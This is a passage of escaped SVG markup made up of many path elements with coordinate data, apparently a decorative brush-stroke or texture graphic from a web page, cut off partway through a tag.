     <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path 